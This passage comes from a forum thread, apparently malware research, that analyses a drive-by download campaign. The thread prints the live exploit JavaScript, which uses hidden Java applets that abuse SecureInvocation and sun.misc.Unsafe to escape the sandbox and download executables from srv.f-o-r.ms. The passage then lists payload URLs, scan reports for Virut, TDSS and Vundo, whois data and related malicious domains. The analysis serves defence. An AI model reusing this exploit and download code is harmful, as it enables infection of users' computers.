jvmsec.width = "1"; jvmsec.height = "1";
document.body.appendChild(jvmsec);
setTimeout("sjvsecc()", 300);
}

if(sjusafe) {
jvmusafe = document.createElement("applet");
jvmusafe.archive = "jvmusafe.jar";
jvmusafe.code = "vmain.class";
jvmusafe.width = "1"; jvmusafe.height = "1";
document.body.appendChild(jvmusafe);
setTimeout("sjvusafc()", 300);
}

if(sjiproc) {
jvmimpro = document.createElement("applet");
jvmimpro.archive = "jvmimpro.jar";
jvmimpro.code = "vmain.class";
jvmimpro.width = "1"; jvmimpro.height = "1";
var jvmimpp = document.createElement("param");
jvmimpp.name = "sdata";
jvmimpp.value = "http://f-o-r.ms/d1.exe";
jvmimpro.appendChild(jvmimpp);
document.body.appendChild(jvmimpro);
}
}catch(e) {} }

function sjvsecc() { x = x+1;
if(typeof jvmsec.getClass != "undefined") { sjvmsec(); }
else if(x < 30) { setTimeout("sjvsecc()", 300); }
}

// SJ_SECMAN INVOKE
function sjvmsec() { try {
var sda="http://srv.f-o-r.ms/xrun.tmp;http://srv.f-o-r.ms/xpre.tmp";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }

function sjvusafc() { z = z+1;
if(typeof jvmusafe.getClass != "undefined") { sjvmusaf(); }
else if(z < 30) { setTimeout("sjvusafc()", 300); }
}

// SJ_USAFE INVOKE
function sjvmusaf() { try {
var sda = "http://srv.f-o-r.ms/xrun.tmp;http://srv.f-o-r.ms/xpre.tmp";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }

}  // end javaenabled
</script>
srv.f-o-r.ms/code/srun
CODE
var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft"+".XMLHTTP"); }catch(e){} }
if(xobj) {
xobj.open("GET", "/code/srun?req", false);
xobj.setRequestHeader("Request", "srun,422643300");
xobj.send(null);
response = xobj.responseText;
}
if(response.length) {
ns(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";
self.close();
}
response = xobj.responseText is then retreived from the server and incorporated in the decoding routine.
IPB Image

IPB Image

IPB Image
Additional files downloaded
  1. srv.f-o-r.ms/get?src=prun
  2. srv.f-o-r.ms/get?src=rasesnet
  3. srv.f-o-r.ms/get?src=erevsnet
  4. srv.f-o-r.ms/get?src=incosnet
  5. srv.f-o-r.ms/get?src=wavvsnet
  6. srv.f-o-r.ms/get?src=winvsnet
Reports.
Virut.
http://www.virustotal.com/analisis/85fd474...65c3662aad249bd
http://www.threatexpert.com/report.aspx?md...895df3298cd4b60

TDSS rootkit
http://www.virustotal.com/analisis/0c05ab4...2587bfc1f35b3d8
http://www.threatexpert.com/report.aspx?md...d5e7ff1a3636a7c

Downloader
http://www.virustotal.com/analisis/76870fb...19490b5ab5a19c1
http://www.threatexpert.com/report.aspx?md...f807d3bfc67ce4d

Vundo
http://www.virustotal.com/analisis/b6683a0...249769ae155a354
http://www.threatexpert.com/report.aspx?md...f86acf47f0639c6

VirusRemover2008
http://www.virustotal.com/analisis/db04d8c...322432f1ea5166b
http://www.threatexpert.com/report.aspx?md...c6851dc5f25894c

Vundo
http://www.virustotal.com/analisis/5821a2d...89f19f9325a9444
http://www.threatexpert.com/report.aspx?md...93761cfd85a0b9f
<h4>
IP details
</h4>
ad3.clickhype.com - 64.27.17.196
Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Name Server: NS1.DNSHAWK.COM - NS2.DNSHAWK.COM
Updated Date: 14-jan-2009
Creation Date: 01-feb-2002

Registrant:
Direct Privacy ID 48393
PO Box 12068
George Town, Grand Cayman KY1-1010
KY
1-345-745-6022

85.17.162.100

hostnames sharing ip with a-records

*.adrefer.net | *.adsrefer.net | *.adteksrv.net | *.adtkserv.net | *.awofkwy.net | *.eorsnacx.net | *.espads.net | *.f-o-r.ms | *.iefjios.net | *.iwdjiamk.net | *.kasdfps.net | *.netcrefer.net | *.svc.ms | *.tqlkg.net | *.xpseek.net | ad.adrefer.net | adnetserver.net | adpopserve.net | adpopshow.net | adrefer.net | ads.adsrefer.net | adsrefer.net | adteksrv.net | adtkserv.net | awltovhc.net | awofkwy.net | eorsnacx.net | f-o-r.ms | iefjios.net | ikwlkad.net | iwdjiamk.net | kasdfps.net | kiafjwo.net | klite..ath.cx | klite.ath.cx | netcrefer.net | netcshow.net | serv.adteksrv.net | serv.adtkserv.net | serv.netcrefer.net | srv.svc.ms | tqlkg.net | www.awofkwy.net | www.eorsnacx.net | www.espads.net | www.iefjios.net | www.iwdjiamk.net | www.kasdfps.net | www.netcrefer.net | www.tqlkg.net | www.xpseek.net | xpseek.net
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.